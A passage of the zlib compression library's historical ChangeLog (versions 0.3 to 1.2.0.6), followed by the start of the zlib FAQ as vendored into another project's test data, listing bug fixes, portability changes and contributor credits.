[Nikl] - Remove some directories in old that have been updated to 1.2 - Add dylib building for Mac OS X in configure and Makefile.in - Remove old distribution stuff from Makefile - Update README to point to DLL_FAQ.txt, and add comment on Mac OS X - Update links in README Changes in 1.2.0.6 (13 September 2003) - Minor FAQ updates - Update contrib/minizip to 1.00 [Vollant] - Remove test of gz functions in example.c when GZ_COMPRESS defined [Truta] - Update POSTINC comment for 68060 [Nikl] - Add contrib/infback9 with deflate64 decoding (unsupported) - For MVS define NO_vsnprintf and undefine FAR [van Burik] - Add pragma for fdopen on MVS [van Burik] Changes in 1.2.0.5 (8 September 2003) - Add OF to inflateBackEnd() declaration in zlib.h - Remember start when using gzdopen in the middle of a file - Use internal off_t counters in gz* functions to properly handle seeks - Perform more rigorous check for distance-too-far in inffast.c - Add Z_BLOCK flush option to return from inflate at block boundary - Set strm->data_type on return from inflate - Indicate bits unused, if at block boundary, and if in last block - Replace size_t with ptrdiff_t in crc32.c, and check for correct size - Add condition so old NO_DEFLATE define still works for compatibility - FAQ update regarding the Windows DLL [Truta] - INDEX update: add qnx entry, remove aix entry [Truta] - Install zlib.3 into mandir [Wilson] - Move contrib/zlib_dll_FAQ.txt to win32/DLL_FAQ.txt; update [Truta] - Adapt the zlib interface to the new DLL convention guidelines [Truta] - Introduce ZLIB_WINAPI macro to allow the export of functions using the WINAPI calling convention, for Visual Basic [Vollant, Truta] - Update msdos and win32 scripts and makefiles [Truta] - Export symbols by name, not by ordinal, in win32/zlib.def [Truta] - Add contrib/ada [Anisimkov] - Move asm files from contrib/vstudio/vc70_32 to contrib/asm386 [Truta] - Rename contrib/asm386 to contrib/masmx86 [Truta, Vollant] - Add contrib/masm686 [Truta] - Fix offsets in contrib/inflate86 and contrib/masmx86/inffas32.asm [Truta, Vollant] - Update contrib/delphi; rename to contrib/pascal; add example [Truta] - Remove contrib/delphi2; add a new contrib/delphi [Truta] - Avoid inclusion of the nonstandard in contrib/iostream, and fix some method prototypes [Truta] - Fix the ZCR_SEED2 constant to avoid warnings in contrib/minizip [Truta] - Avoid the use of backslash (\) in contrib/minizip [Vollant] - Fix file time handling in contrib/untgz; update makefiles [Truta] - Update contrib/vstudio/vc70_32 to comply with the new DLL guidelines [Vollant] - Remove contrib/vstudio/vc15_16 [Vollant] - Rename contrib/vstudio/vc70_32 to contrib/vstudio/vc7 [Truta] - Update README.contrib [Truta] - Invert the assignment order of match_head and s->prev[...] in INSERT_STRING [Truta] - Compare TOO_FAR with 32767 instead of 32768, to avoid 16-bit warnings [Truta] - Compare function pointers with 0, not with NULL or Z_NULL [Truta] - Fix prototype of syncsearch in inflate.c [Truta] - Introduce ASMINF macro to be enabled when using an ASM implementation of inflate_fast [Truta] - Change NO_DEFLATE to NO_GZCOMPRESS [Truta] - Modify test_gzio in example.c to take a single file name as a parameter [Truta] - Exit the example.c program if gzopen fails [Truta] - Add type casts around strlen in example.c [Truta] - Remove casting to sizeof in minigzip.c; give a proper type to the variable compared with SUFFIX_LEN [Truta] - Update definitions of STDC and STDC99 in zconf.h [Truta] - Synchronize zconf.h with the new Windows DLL interface [Truta] - Use SYS16BIT instead of __32BIT__ to distinguish between 16- and 32-bit platforms [Truta] - Use far memory allocators in small 16-bit memory models for Turbo C [Truta] - Add info about the use of ASMV, ASMINF and ZLIB_WINAPI in zlibCompileFlags [Truta] - Cygwin has vsnprintf [Wilson] - In Windows16, OS_CODE is 0, as in MSDOS [Truta] - In Cygwin, OS_CODE is 3 (Unix), not 11 (Windows32) [Wilson] Changes in 1.2.0.4 (10 August 2003) - Minor FAQ updates - Be more strict when checking inflateInit2's windowBits parameter - Change NO_GUNZIP compile option to NO_GZIP to cover deflate as well - Add gzip wrapper option to deflateInit2 using windowBits - Add updated QNX rule in configure and qnx directory [Bonnefoy] - Make inflate distance-too-far checks more rigorous - Clean up FAR usage in inflate - Add casting to sizeof() in gzio.c and minigzip.c Changes in 1.2.0.3 (19 July 2003) - Fix silly error in gzungetc() implementation [Vollant] - Update contrib/minizip and contrib/vstudio [Vollant] - Fix printf format in example.c - Correct cdecl support in zconf.in.h [Anisimkov] - Minor FAQ updates Changes in 1.2.0.2 (13 July 2003) - Add ZLIB_VERNUM in zlib.h for numerical preprocessor comparisons - Attempt to avoid warnings in crc32.c for pointer-int conversion - Add AIX to configure, remove aix directory [Bakker] - Add some casts to minigzip.c - Improve checking after insecure sprintf() or vsprintf() calls - Remove #elif's from crc32.c - Change leave label to inf_leave in inflate.c and infback.c to avoid library conflicts - Remove inflate gzip decoding by default--only enable gzip decoding by special request for stricter backward compatibility - Add zlibCompileFlags() function to return compilation information - More typecasting in deflate.c to avoid warnings - Remove leading underscore from _Capital #defines [Truta] - Fix configure to link shared library when testing - Add some Windows CE target adjustments [Mai] - Remove #define ZLIB_DLL in zconf.h [Vollant] - Add zlib.3 [Rodgers] - Update RFC URL in deflate.c and algorithm.txt [Mai] - Add zlib_dll_FAQ.txt to contrib [Truta] - Add UL to some constants [Truta] - Update minizip and vstudio [Vollant] - Remove vestigial NEED_DUMMY_RETURN from zconf.in.h - Expand use of NO_DUMMY_DECL to avoid all dummy structures - Added iostream3 to contrib [Schwardt] - Replace rewind() with fseek() for WinCE [Truta] - Improve setting of zlib format compression level flags - Report 0 for huffman and rle strategies and for level == 0 or 1 - Report 2 only for level == 6 - Only deal with 64K limit when necessary at compile time [Truta] - Allow TOO_FAR check to be turned off at compile time [Truta] - Add gzclearerr() function [Souza] - Add gzungetc() function Changes in 1.2.0.1 (17 March 2003) - Add Z_RLE strategy for run-length encoding [Truta] - When Z_RLE requested, restrict matches to distance one - Update zlib.h, minigzip.c, gzopen(), gzdopen() for Z_RLE - Correct FASTEST compilation to allow level == 0 - Clean up what gets compiled for FASTEST - Incorporate changes to zconf.in.h [Vollant] - Refine detection of Turbo C need for dummy returns - Refine ZLIB_DLL compilation - Include additional header file on VMS for off_t typedef - Try to use _vsnprintf where it supplants vsprintf [Vollant] - Add some casts in inffast.c - Enhance comments in zlib.h on what happens if gzprintf() tries to write more than 4095 bytes before compression - Remove unused state from inflateBackEnd() - Remove exit(0) from minigzip.c, example.c - Get rid of all those darn tabs - Add "check" target to Makefile.in that does the same thing as "test" - Add "mostlyclean" and "maintainer-clean" targets to Makefile.in - Update contrib/inflate86 [Anderson] - Update contrib/testzlib, contrib/vstudio, contrib/minizip [Vollant] - Add msdos and win32 directories with makefiles [Truta] - More additions and improvements to the FAQ Changes in 1.2.0 (9 March 2003) - New and improved inflate code - About 20% faster - Does not allocate 32K window unless and until needed - Automatically detects and decompresses gzip streams - Raw inflate no longer needs an extra dummy byte at end - Added inflateBack functions using a callback interface--even faster than inflate, useful for file utilities (gzip, zip) - Added inflateCopy() function to record state for random access on externally generated deflate streams (e.g. in gzip files) - More readable code (I hope) - New and improved crc32() - About 50% faster, thanks to suggestions from Rodney Brown - Add deflateBound() and compressBound() functions - Fix memory leak in deflateInit2() - Permit setting dictionary for raw deflate (for parallel deflate) - Fix const declaration for gzwrite() - Check for some malloc() failures in gzio.c - Fix bug in gzopen() on single-byte file 0x1f - Fix bug in gzread() on concatenated file with 0x1f at end of buffer and next buffer doesn't start with 0x8b - Fix uncompress() to return Z_DATA_ERROR on truncated input - Free memory at end of example.c - Remove MAX #define in trees.c (conflicted with some libraries) - Fix static const's in deflate.c, gzio.c, and zutil.[ch] - Declare malloc() and free() in gzio.c if STDC not defined - Use malloc() instead of calloc() in zutil.c if int big enough - Define STDC for AIX - Add aix/ with approach for compiling shared library on AIX - Add HP-UX support for shared libraries in configure - Add OpenUNIX support for shared libraries in configure - Use $cc instead of gcc to build shared library - Make prefix directory if needed when installing - Correct Macintosh avoidance of typedef Byte in zconf.h - Correct Turbo C memory allocation when under Linux - Use libz.a instead of -lz in Makefile (assure use of compiled library) - Update configure to check for snprintf or vsnprintf functions and their return value, warn during make if using an insecure function - Fix configure problem with compile-time knowledge of HAVE_UNISTD_H that is lost when library is used--resolution is to build new zconf.h - Documentation improvements (in zlib.h): - Document raw deflate and inflate - Update RFCs URL - Point out that zlib and gzip formats are different - Note that Z_BUF_ERROR is not fatal - Document string limit for gzprintf() and possible buffer overflow - Note requirement on avail_out when flushing - Note permitted values of flush parameter of inflate() - Add some FAQs (and even answers) to the FAQ - Add contrib/inflate86/ for x86 faster inflate - Add contrib/blast/ for PKWare Data Compression Library decompression - Add contrib/puff/ simple inflate for deflate format description Changes in 1.1.4 (11 March 2002) - ZFREE was repeated on same allocation on some error conditions This creates a security problem described in http://www.zlib.org/advisory-2002-03-11.txt - Returned incorrect error (Z_MEM_ERROR) on some invalid data - Avoid accesses before window for invalid distances with inflate window less than 32K - force windowBits > 8 to avoid a bug in the encoder for a window size of 256 bytes. (A complete fix will be available in 1.1.5) Changes in 1.1.3 (9 July 1998) - fix "an inflate input buffer bug that shows up on rare but persistent occasions" (Mark) - fix gzread and gztell for concatenated .gz files (Didier Le Botlan) - fix gzseek(..., SEEK_SET) in write mode - fix crc check after a gzeek (Frank Faubert) - fix miniunzip when the last entry in a zip file is itself a zip file (J Lillge) - add contrib/asm586 and contrib/asm686 (Brian Raiter) See http://www.muppetlabs.com/~breadbox/software/assembly.html - add support for Delphi 3 in contrib/delphi (Bob Dellaca) - add support for C++Builder 3 and Delphi 3 in contrib/delphi2 (Davide Moretti) - do not exit prematurely in untgz if 0 at start of block (Magnus Holmgren) - use macro EXTERN instead of extern to support DLL for BeOS (Sander Stoks) - added a FAQ file - Support gzdopen on Mac with Metrowerks (Jason Linhart) - Do not redefine Byte on Mac (Brad Pettit & Jason Linhart) - define SEEK_END too if SEEK_SET is not defined (Albert Chin-A-Young) - avoid some warnings with Borland C (Tom Tanner) - fix a problem in contrib/minizip/zip.c for 16-bit MSDOS (Gilles Vollant) - emulate utime() for WIN32 in contrib/untgz (Gilles Vollant) - allow several arguments to configure (Tim Mooney, Frodo Looijaard) - use libdir and includedir in Makefile.in (Tim Mooney) - support shared libraries on OSF1 V4 (Tim Mooney) - remove so_locations in "make clean" (Tim Mooney) - fix maketree.c compilation error (Glenn, Mark) - Python interface to zlib now in Python 1.5 (Jeremy Hylton) - new Makefile.riscos (Rich Walker) - initialize static descriptors in trees.c for embedded targets (Nick Smith) - use "foo-gz" in example.c for RISCOS and VMS (Nick Smith) - add the OS/2 files in Makefile.in too (Andrew Zabolotny) - fix fdopen and halloc macros for Microsoft C 6.0 (Tom Lane) - fix maketree.c to allow clean compilation of inffixed.h (Mark) - fix parameter check in deflateCopy (Gunther Nikl) - cleanup trees.c, use compressed_len only in debug mode (Christian Spieler) - Many portability patches by Christian Spieler: . zutil.c, zutil.h: added "const" for zmem* . Make_vms.com: fixed some typos . Make_vms.com: msdos/Makefile.*: removed zutil.h from some dependency lists . msdos/Makefile.msc: remove "default rtl link library" info from obj files . msdos/Makefile.*: use model-dependent name for the built zlib library . msdos/Makefile.emx, nt/Makefile.emx, nt/Makefile.gcc: new makefiles, for emx (DOS/OS2), emx&rsxnt and mingw32 (Windows 9x / NT) - use define instead of typedef for Bytef also for MSC small/medium (Tom Lane) - replace __far with _far for better portability (Christian Spieler, Tom Lane) - fix test for errno.h in configure (Tim Newsham) Changes in 1.1.2 (19 March 98) - added contrib/minzip, mini zip and unzip based on zlib (Gilles Vollant) See http://www.winimage.com/zLibDll/unzip.html - preinitialize the inflate tables for fixed codes, to make the code completely thread safe (Mark) - some simplifications and slight speed-up to the inflate code (Mark) - fix gzeof on non-compressed files (Allan Schrum) - add -std1 option in configure for OSF1 to fix gzprintf (Martin Mokrejs) - use default value of 4K for Z_BUFSIZE for 16-bit MSDOS (Tim Wegner + Glenn) - added os2/Makefile.def and os2/zlib.def (Andrew Zabolotny) - add shared lib support for UNIX_SV4.2MP (MATSUURA Takanori) - do not wrap extern "C" around system includes (Tom Lane) - mention zlib binding for TCL in README (Andreas Kupries) - added amiga/Makefile.pup for Amiga powerUP SAS/C PPC (Andreas Kleinert) - allow "make install prefix=..." even after configure (Glenn Randers-Pehrson) - allow "configure --prefix $HOME" (Tim Mooney) - remove warnings in example.c and gzio.c (Glenn Randers-Pehrson) - move Makefile.sas to amiga/Makefile.sas Changes in 1.1.1 (27 Feb 98) - fix macros _tr_tally_* in deflate.h for debug mode (Glenn Randers-Pehrson) - remove block truncation heuristic which had very marginal effect for zlib (smaller lit_bufsize than in gzip 1.2.4) and degraded a little the compression ratio on some files. This also allows inlining _tr_tally for matches in deflate_slow - added msdos/Makefile.w32 for WIN32 Microsoft Visual C++ (Bob Frazier) Changes in 1.1.0 (24 Feb 98) - do not return STREAM_END prematurely in inflate (John Bowler) - revert to the zlib 1.0.8 inflate to avoid the gcc 2.8.0 bug (Jeremy Buhler) - compile with -DFASTEST to get compression code optimized for speed only - in minigzip, try mmap'ing the input file first (Miguel Albrecht) - increase size of I/O buffers in minigzip.c and gzio.c (not a big gain on Sun but significant on HP) - add a pointer to experimental unzip library in README (Gilles Vollant) - initialize variable gcc in configure (Chris Herborth) Changes in 1.0.9 (17 Feb 1998) - added gzputs and gzgets functions - do not clear eof flag in gzseek (Mark Diekhans) - fix gzseek for files in transparent mode (Mark Diekhans) - do not assume that vsprintf returns the number of bytes written (Jens Krinke) - replace EXPORT with ZEXPORT to avoid conflict with other programs - added compress2 in zconf.h, zlib.def, zlib.dnt - new asm code from Gilles Vollant in contrib/asm386 - simplify the inflate code (Mark): . Replace ZALLOC's in huft_build() with single ZALLOC in inflate_blocks_new() . ZALLOC the length list in inflate_trees_fixed() instead of using stack . ZALLOC the value area for huft_build() instead of using stack . Simplify Z_FINISH check in inflate() - Avoid gcc 2.8.0 comparison bug a little differently than zlib 1.0.8 - in inftrees.c, avoid cc -O bug on HP (Farshid Elahi) - in zconf.h move the ZLIB_DLL stuff earlier to avoid problems with the declaration of FAR (Gilles Vollant) - install libz.so* with mode 755 (executable) instead of 644 (Marc Lehmann) - read_buf buf parameter of type Bytef* instead of charf* - zmemcpy parameters are of type Bytef*, not charf* (Joseph Strout) - do not redeclare unlink in minigzip.c for WIN32 (John Bowler) - fix check for presence of directories in "make install" (Ian Willis) Changes in 1.0.8 (27 Jan 1998) - fixed offsets in contrib/asm386/gvmat32.asm (Gilles Vollant) - fix gzgetc and gzputc for big endian systems (Markus Oberhumer) - added compress2() to allow setting the compression level - include sys/types.h to get off_t on some systems (Marc Lehmann & QingLong) - use constant arrays for the static trees in trees.c instead of computing them at run time (thanks to Ken Raeburn for this suggestion). To create trees.h, compile with GEN_TREES_H and run "make test" - check return code of example in "make test" and display result - pass minigzip command line options to file_compress - simplifying code of inflateSync to avoid gcc 2.8 bug - support CC="gcc -Wall" in configure -s (QingLong) - avoid a flush caused by ftell in gzopen for write mode (Ken Raeburn) - fix test for shared library support to avoid compiler warnings - zlib.lib -> zlib.dll in msdos/zlib.rc (Gilles Vollant) - check for TARGET_OS_MAC in addition to MACOS (Brad Pettit) - do not use fdopen for Metrowerks on Mac (Brad Pettit)) - add checks for gzputc and gzputc in example.c - avoid warnings in gzio.c and deflate.c (Andreas Kleinert) - use const for the CRC table (Ken Raeburn) - fixed "make uninstall" for shared libraries - use Tracev instead of Trace in infblock.c - in example.c use correct compressed length for test_sync - suppress +vnocompatwarnings in configure for HPUX (not always supported) Changes in 1.0.7 (20 Jan 1998) - fix gzseek which was broken in write mode - return error for gzseek to negative absolute position - fix configure for Linux (Chun-Chung Chen) - increase stack space for MSC (Tim Wegner) - get_crc_table and inflateSyncPoint are EXPORTed (Gilles Vollant) - define EXPORTVA for gzprintf (Gilles Vollant) - added man page zlib.3 (Rick Rodgers) - for contrib/untgz, fix makedir() and improve Makefile - check gzseek in write mode in example.c - allocate extra buffer for seeks only if gzseek is actually called - avoid signed/unsigned comparisons (Tim Wegner, Gilles Vollant) - add inflateSyncPoint in zconf.h - fix list of exported functions in nt/zlib.dnt and mdsos/zlib.def Changes in 1.0.6 (19 Jan 1998) - add functions gzprintf, gzputc, gzgetc, gztell, gzeof, gzseek, gzrewind and gzsetparams (thanks to Roland Giersig and Kevin Ruland for some of this code) - Fix a deflate bug occurring only with compression level 0 (thanks to Andy Buckler for finding this one) - In minigzip, pass transparently also the first byte for .Z files - return Z_BUF_ERROR instead of Z_OK if output buffer full in uncompress() - check Z_FINISH in inflate (thanks to Marc Schluper) - Implement deflateCopy (thanks to Adam Costello) - make static libraries by default in configure, add --shared option - move MSDOS or Windows specific files to directory msdos - suppress the notion of partial flush to simplify the interface (but the symbol Z_PARTIAL_FLUSH is kept for compatibility with 1.0.4) - suppress history buffer provided by application to simplify the interface (this feature was not implemented anyway in 1.0.4) - next_in and avail_in must be initialized before calling inflateInit or inflateInit2 - add EXPORT in all exported functions (for Windows DLL) - added Makefile.nt (thanks to Stephen Williams) - added the unsupported "contrib" directory: contrib/asm386/ by Gilles Vollant 386 asm code replacing longest_match() contrib/iostream/ by Kevin Ruland A C++ I/O streams interface to the zlib gz* functions contrib/iostream2/ by Tyge Løvset Another C++ I/O streams interface contrib/untgz/ by "Pedro A. Aranda Guti\irrez" A very simple tar.gz file extractor using zlib contrib/visual-basic.txt by Carlos Rios How to use compress(), uncompress() and the gz* functions from VB - pass params -f (filtered data), -h (huffman only), -1 to -9 (compression level) in minigzip (thanks to Tom Lane) - use const for rommable constants in deflate - added test for gzseek and gztell in example.c - add undocumented function inflateSyncPoint() (hack for Paul Mackerras) - add undocumented function zError to convert error code to string (for Tim Smithers) - Allow compilation of gzio with -DNO_DEFLATE to avoid the compression code - Use default memcpy for Symantec MSDOS compiler - Add EXPORT keyword for check_func (needed for Windows DLL) - add current directory to LD_LIBRARY_PATH for "make test" - create also a link for libz.so.1 - added support for FUJITSU UXP/DS (thanks to Toshiaki Nomura) - use $(SHAREDLIB) instead of libz.so in Makefile.in (for HPUX) - added -soname for Linux in configure (Chun-Chung Chen, - assign numbers to the exported functions in zlib.def (for Windows DLL) - add advice in zlib.h for best usage of deflateSetDictionary - work around compiler bug on Atari (cast Z_NULL in call of s->checkfn) - allow compilation with ANSI keywords only enabled for TurboC in large model - avoid "versionString"[0] (Borland bug) - add NEED_DUMMY_RETURN for Borland - use variable z_verbose for tracing in debug mode (L. Peter Deutsch) - allow compilation with CC - defined STDC for OS/2 (David Charlap) - limit external names to 8 chars for MVS (Thomas Lund) - in minigzip.c, use static buffers only for 16-bit systems - fix suffix check for "minigzip -d foo.gz" - do not return an error for the 2nd of two consecutive gzflush() (Felix Lee) - use _fdopen instead of fdopen for MSC >= 6.0 (Thomas Fanslau) - added makelcc.bat for lcc-win32 (Tom St Denis) - in Makefile.dj2, use copy and del instead of install and rm (Frank Donahoe) - Avoid expanded $Id$. Use "rcs -kb" or "cvs admin -kb" to avoid Id expansion - check for unistd.h in configure (for off_t) - remove useless check parameter in inflate_blocks_free - avoid useless assignment of s->check to itself in inflate_blocks_new - do not flush twice in gzclose (thanks to Ken Raeburn) - rename FOPEN as F_OPEN to avoid clash with /usr/include/sys/file.h - use NO_ERRNO_H instead of enumeration of operating systems with errno.h - work around buggy fclose on pipes for HP/UX - support zlib DLL with BORLAND C++ 5.0 (thanks to Glenn Randers-Pehrson) - fix configure if CC is already equal to gcc Changes in 1.0.5 (3 Jan 98) - Fix inflate to terminate gracefully when fed corrupted or invalid data - Use const for rommable constants in inflate - Eliminate memory leaks on error conditions in inflate - Removed some vestigial code in inflate - Update web address in README Changes in 1.0.4 (24 Jul 96) - In very rare conditions, deflate(s, Z_FINISH) could fail to produce an EOF bit, so the decompressor could decompress all the correct data but went on to attempt decompressing extra garbage data. This affected minigzip too - zlibVersion and gzerror return const char* (needed for DLL) - port to RISCOS (no fdopen, no multiple dots, no unlink, no fileno) - use z_error only for DEBUG (avoid problem with DLLs) Changes in 1.0.3 (2 Jul 96) - use z_streamp instead of z_stream *, which is now a far pointer in MSDOS small and medium models; this makes the library incompatible with previous versions for these models. (No effect in large model or on other systems.) - return OK instead of BUF_ERROR if previous deflate call returned with avail_out as zero but there is nothing to do - added memcmp for non STDC compilers - define NO_DUMMY_DECL for more Mac compilers (.h files merged incorrectly) - define __32BIT__ if __386__ or i386 is defined (pb. with Watcom and SCO) - better check for 16-bit mode MSC (avoids problem with Symantec) Changes in 1.0.2 (23 May 96) - added Windows DLL support - added a function zlibVersion (for the DLL support) - fixed declarations using Bytef in infutil.c (pb with MSDOS medium model) - Bytef is define's instead of typedef'd only for Borland C - avoid reading uninitialized memory in example.c - mention in README that the zlib format is now RFC1950 - updated Makefile.dj2 - added algorithm.doc Changes in 1.0.1 (20 May 96) [1.0 skipped to avoid confusion] - fix array overlay in deflate.c which sometimes caused bad compressed data - fix inflate bug with empty stored block - fix MSDOS medium model which was broken in 0.99 - fix deflateParams() which could generate bad compressed data - Bytef is define'd instead of typedef'ed (work around Borland bug) - added an INDEX file - new makefiles for DJGPP (Makefile.dj2), 32-bit Borland (Makefile.b32), Watcom (Makefile.wat), Amiga SAS/C (Makefile.sas) - speed up adler32 for modern machines without auto-increment - added -ansi for IRIX in configure - static_init_done in trees.c is an int - define unlink as delete for VMS - fix configure for QNX - add configure branch for SCO and HPUX - avoid many warnings (unused variables, dead assignments, etc...) - no fdopen for BeOS - fix the Watcom fix for 32 bit mode (define FAR as empty) - removed redefinition of Byte for MKWERKS - work around an MWKERKS bug (incorrect merge of all .h files) Changes in 0.99 (27 Jan 96) - allow preset dictionary shared between compressor and decompressor - allow compression level 0 (no compression) - add deflateParams in zlib.h: allow dynamic change of compression level and compression strategy - test large buffers and deflateParams in example.c - add optional "configure" to build zlib as a shared library - suppress Makefile.qnx, use configure instead - fixed deflate for 64-bit systems (detected on Cray) - fixed inflate_blocks for 64-bit systems (detected on Alpha) - declare Z_DEFLATED in zlib.h (possible parameter for deflateInit2) - always return Z_BUF_ERROR when deflate() has nothing to do - deflateInit and inflateInit are now macros to allow version checking - prefix all global functions and types with z_ with -DZ_PREFIX - make falloc completely reentrant (inftrees.c) - fixed very unlikely race condition in ct_static_init - free in reverse order of allocation to help memory manager - use zlib-1.0/* instead of zlib/* inside the tar.gz - make zlib warning-free with "gcc -O3 -Wall -Wwrite-strings -Wpointer-arith -Wconversion -Wstrict-prototypes -Wmissing-prototypes" - allow gzread on concatenated .gz files - deflateEnd now returns Z_DATA_ERROR if it was premature - deflate is finally (?) fully deterministic (no matches beyond end of input) - Document Z_SYNC_FLUSH - add uninstall in Makefile - Check for __cpluplus in zlib.h - Better test in ct_align for partial flush - avoid harmless warnings for Borland C++ - initialize hash_head in deflate.c - avoid warning on fdopen (gzio.c) for HP cc -Aa - include stdlib.h for STDC compilers - include errno.h for Cray - ignore error if ranlib doesn't exist - call ranlib twice for NeXTSTEP - use exec_prefix instead of prefix for libz.a - renamed ct_* as _tr_* to avoid conflict with applications - clear z->msg in inflateInit2 before any error return - initialize opaque in example.c, gzio.c, deflate.c and inflate.c - fixed typo in zconf.h (_GNUC__ => __GNUC__) - check for WIN32 in zconf.h and zutil.c (avoid farmalloc in 32-bit mode) - fix typo in Make_vms.com (f$trnlnm -> f$getsyi) - in fcalloc, normalize pointer if size > 65520 bytes - don't use special fcalloc for 32 bit Borland C++ - use STDC instead of __GO32__ to avoid redeclaring exit, calloc, etc. - use Z_BINARY instead of BINARY - document that gzclose after gzdopen will close the file - allow "a" as mode in gzopen - fix error checking in gzread - allow skipping .gz extra-field on pipes - added reference to Perl interface in README - put the crc table in FAR data (I dislike more and more the medium model :) - added get_crc_table - added a dimension to all arrays (Borland C can't count) - workaround Borland C bug in declaration of inflate_codes_new & inflate_fast - guard against multiple inclusion of *.h (for precompiled header on Mac) - Watcom C pretends to be Microsoft C small model even in 32 bit mode - don't use unsized arrays to avoid silly warnings by Visual C++: warning C4746: 'inflate_mask' : unsized array treated as '__far' (what's wrong with far data in far model?) - define enum out of inflate_blocks_state to allow compilation with C++ Changes in 0.95 (16 Aug 95) - fix MSDOS small and medium model (now easier to adapt to any compiler) - inlined send_bits - fix the final (:-) bug for deflate with flush (output was correct but not completely flushed in rare occasions) - default window size is same for compression and decompression (it's now sufficient to set MAX_WBITS in zconf.h) - voidp -> voidpf and voidnp -> voidp (for consistency with other typedefs and because voidnp was not near in large model) Changes in 0.94 (13 Aug 95) - support MSDOS medium model - fix deflate with flush (could sometimes generate bad output) - fix deflateReset (zlib header was incorrectly suppressed) - added support for VMS - allow a compression level in gzopen() - gzflush now calls fflush - For deflate with flush, flush even if no more input is provided - rename libgz.a as libz.a - avoid complex expression in infcodes.c triggering Turbo C bug - work around a problem with gcc on Alpha (in INSERT_STRING) - don't use inline functions (problem with some gcc versions) - allow renaming of Byte, uInt, etc... with #define - avoid warning about (unused) pointer before start of array in deflate.c - avoid various warnings in gzio.c, example.c, infblock.c, adler32.c, zutil.c - avoid reserved word 'new' in trees.c Changes in 0.93 (25 June 95) - temporarily disable inline functions - make deflate deterministic - give enough lookahead for PARTIAL_FLUSH - Set binary mode for stdin/stdout in minigzip.c for OS/2 - don't even use signed char in inflate (not portable enough) - fix inflate memory leak for segmented architectures Changes in 0.92 (3 May 95) - don't assume that char is signed (problem on SGI) - Clear bit buffer when starting a stored block - no memcpy on Pyramid - suppressed inftest.c - optimized fill_window, put longest_match inline for gcc - optimized inflate on stored blocks - untabify all sources to simplify patches Changes in 0.91 (2 May 95) - Default MEM_LEVEL is 8 (not 9 for Unix) as documented in zlib.h - Document the memory requirements in zconf.h - added "make install" - fix sync search logic in inflateSync - deflate(Z_FULL_FLUSH) now works even if output buffer too short - after inflateSync, don't scare people with just "lo world" - added support for DJGPP Changes in 0.9 (1 May 95) - don't assume that zalloc clears the allocated memory (the TurboC bug was Mark's bug after all :) - let again gzread copy uncompressed data unchanged (was working in 0.71) - deflate(Z_FULL_FLUSH), inflateReset and inflateSync are now fully implemented - added a test of inflateSync in example.c - moved MAX_WBITS to zconf.h because users might want to change that - document explicitly that zalloc(64K) on MSDOS must return a normalized pointer (zero offset) - added Makefiles for Microsoft C, Turbo C, Borland C++ - faster crc32() Changes in 0.8 (29 April 95) - added fast inflate (inffast.c) - deflate(Z_FINISH) now returns Z_STREAM_END when done. Warning: this is incompatible with previous versions of zlib which returned Z_OK - work around a TurboC compiler bug (bad code for b << 0, see infutil.h) (actually that was not a compiler bug, see 0.81 above) - gzread no longer reads one extra byte in certain cases - In gzio destroy(), don't reference a freed structure - avoid many warnings for MSDOS - avoid the ERROR symbol which is used by MS Windows Changes in 0.71 (14 April 95) - Fixed more MSDOS compilation problems :( There is still a bug with TurboC large model Changes in 0.7 (14 April 95) - Added full inflate support - Simplified the crc32() interface. The pre- and post-conditioning (one's complement) is now done inside crc32(). WARNING: this is incompatible with previous versions; see zlib.h for the new usage Changes in 0.61 (12 April 95) - workaround for a bug in TurboC. example and minigzip now work on MSDOS Changes in 0.6 (11 April 95) - added minigzip.c - added gzdopen to reopen a file descriptor as gzFile - added transparent reading of non-gziped files in gzread - fixed bug in gzread (don't read crc as data) - fixed bug in destroy (gzio.c) (don't return Z_STREAM_END for gzclose) - don't allocate big arrays in the stack (for MSDOS) - fix some MSDOS compilation problems Changes in 0.5: - do real compression in deflate.c. Z_PARTIAL_FLUSH is supported but not yet Z_FULL_FLUSH - support decompression but only in a single step (forced Z_FINISH) - added opaque object for zalloc and zfree - added deflateReset and inflateReset - added a variable zlib_version for consistency checking - renamed the 'filter' parameter of deflateInit2 as 'strategy' Added Z_FILTERED and Z_HUFFMAN_ONLY constants Changes in 0.4: - avoid "zip" everywhere, use zlib instead of ziplib - suppress Z_BLOCK_FLUSH, interpret Z_PARTIAL_FLUSH as block flush if compression method == 8 - added adler32 and crc32 - renamed deflateOptions as deflateInit2, call one or the other but not both - added the method parameter for deflateInit2 - added inflateInit2 - simplified considerably deflateInit and inflateInit by not supporting user-provided history buffer. This is supported only in deflateInit2 and inflateInit2 Changes in 0.3: - prefix all macro names with Z_ - use Z_FINISH instead of deflateEnd to finish compression - added Z_HUFFMAN_ONLY - added gzerror() ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/FAQ ================================================ Frequently Asked Questions about zlib If your question is not there, please check the zlib home page http://zlib.net/ which may have more recent information. The latest zlib FAQ is at http://zlib.net/zlib_faq.html 1. Is zlib Y2K-compliant? Yes. zlib doesn't handle dates. 2. Where can I get a Windows DLL version? The zlib sources can be compiled without change to produce a DLL. See the file win32/DLL_FAQ.txt in the zlib distribution. Pointers to the precompiled DLL are found in the zlib web site at http://zlib.net/ . 3. Where can I get a Visual Basic interface to zlib? See * http://marknelson.us/1997/01/01/zlib-engine/ * win32/DLL_FAQ.txt in the zlib distribution 4. compress() returns Z_BUF_ERROR. Make sure that before the call of compress(), the length of the compressed buffer is equal to the available size of the compressed buffer and not zero. For Visual Basic, check that this parameter is passed by reference ("as any"), not by value ("as long"). 5. deflate() or inflate() returns Z_BUF_ERROR. Before making the call, make sure that avail_in and avail_out are not zero. When setting the parameter flush equal to Z_FINISH, also make sure that avail_out is big enough to allow processing all pending input. Note that a Z_BUF_ERROR is not fatal--another call to deflate() or inflate() can be made with more input or output space. A Z_BUF_ERROR may in fact be unavoidable depending on how the functions are used, since it is not possible to tell whether or not there is more output pending when strm.avail_out returns with zero. See http://zlib.net/zlib_how.html for a heavily annotated example. 6. Where's the zlib documentation (man pages, etc.)? It's in zlib.h . Examples of zlib usage are in the files test/example.c and test/minigzip.c, with more in examples/ . 7. Why don't you use GNU autoconf or libtool or ...? Because we would like to keep zlib as a very small and simple package. zlib is rather portable and doesn't need much configuration. 8. I found a bug in zlib. Most of the time, such problems are due to an incorrect usage of zlib. Please try to reproduce the problem with a small program and send the corresponding source to us at zlib@gzip.org . Do not send multi-megabyte data files without prior agreement. 9. Why do I get "undefined reference to gzputc"? If "make test" produces something like example.o(.text+0x154): undefined reference to `gzputc' check that you don't have old files libz.* in /usr/lib, 